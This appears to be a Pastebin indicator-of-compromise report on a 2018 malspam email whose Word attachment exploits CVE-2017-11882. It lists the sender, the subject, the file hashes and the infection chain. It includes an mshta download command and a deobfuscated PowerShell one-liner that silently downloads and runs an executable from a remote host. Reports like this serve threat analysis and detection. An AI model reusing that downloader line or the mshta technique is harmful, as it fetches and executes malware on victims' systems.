Advertisement
pastehaste

2018-01-31 - CVE-2017-11882 MALSPAM

Jan 31st, 2018
371
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.96 KB | None | 0 0
  1. SENDER:
  2. khalidmc@alkoutprojects.com
  3.  
  4. SUBJECT:
  5. RFQ: 9607 (NEW ORDER)
  6.  
  7. ATTACHMENT:
  8. RFQ 9607 (NEW ORDER).doc
  9. 1e268f16aa9af3c387ca676df85dd75d
  10. 3cd2654d9d51257b4961f93a44b0510b9639b81ab6677da1414305c02390a3f5
  11. (attachment exploits CVE-2017-11882, uses mshta bypass method to DL, run VBScript)
  12.  
  13. mshta hxxps://d.pr/lWjMRa/d.pr
  14.  
  15. HTA EXECUTED VIA MSHTA:
  16. d.pr
  17. 458cfb92a4527a53bb4b9a5d739f206f
  18. 0a6b8c9ed83385b73628fb9854e387b2d75c5be34fc5f093c0aa61f0814c9620
  19.  
  20. DEOBFUSCATED VBSCRIPT SNIPPET:
  21. "powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -command try{$down = New-Object System.Net.WebClient;$url = 'HTTPS:/'+'/'+'d.pr/4Fa51z/d.pr';$file = $env:temp + '\\d.exe';$down.DownloadFile($url,$file);$exec = New-Object -com shell.application;$exec.shellexecute($file);}catch{}exit;"
  22.  
  23. HTTP REQUEST:
  24. https://d.pr/4Fa51z/d.pr
  25.  
  26. EXE DROPPED:
  27. d.pr (EXE)
  28. b6ba8e4bfa739772d2bbcc965309fc50
  29. 8f6bbfce551283f44a1263246f3c633bfbb9d60520a5543d36ad94fc8e7736bf
  30.  
  31.  
  32. ....
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement